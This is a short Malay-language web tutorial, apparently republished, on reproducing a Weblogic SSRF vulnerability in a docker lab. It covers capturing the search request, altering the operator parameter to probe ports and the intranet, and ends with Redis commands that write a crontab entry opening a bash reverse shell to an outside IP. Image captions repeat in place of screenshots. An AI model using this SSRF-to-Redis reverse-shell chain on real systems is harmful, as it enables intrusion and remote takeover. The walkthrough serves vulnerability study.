Rumah  >  Artikel  >  Operasi dan penyelenggaraan  >  Cara Menghasilkan Semula Kerentanan SSRF Weblogic

Cara Menghasilkan Semula Kerentanan SSRF Weblogic

王林
王林ke hadapan
2023-05-14 20:04:041395semak imbas

1. Gunakan docker untuk membina persekitaran

Pemasangan docker dan tutorial membina persekitaran: https://www.freebuf.com/sectool/252257.html

如何实现Weblogic SSRF漏洞复现

Akses port 7001如何实现Weblogic SSRF漏洞复现

2. Langkah-langkah Pengeluaran Semula Kerentanan

1.

2. Semak tempat IBM

如何实现Weblogic SSRF漏洞复现

dan dapatkan bahawa ia adalah sambungan, yang bermaksud mungkin terdapat ssrf

如何实现Weblogic SSRF漏洞复现3 tangkap paket. Klik Cari

如何实现Weblogic SSRF漏洞复现

4 Ubah suai sambungan parameter operator

如何实现Weblogic SSRF漏洞复现

<.>5. Hasil capaian

Mengakses pengembalian port yang tidak wujud tidak dapat disambungkan melalui HTTP如何实现Weblogic SSRF漏洞复现

Mengakses port sedia ada mengembalikan kod status

如何实现Weblogic SSRF漏洞复现

Akses intranet

如何实现Weblogic SSRF漏洞复现

Gunakan redis untuk melantunkan muatan shell

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

Atas ialah kandungan terperinci Cara Menghasilkan Semula Kerentanan SSRF Weblogic. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Kenyataan:
Artikel ini dikembalikan pada:yisu.com. Jika ada pelanggaran, sila hubungi admin@php.cn Padam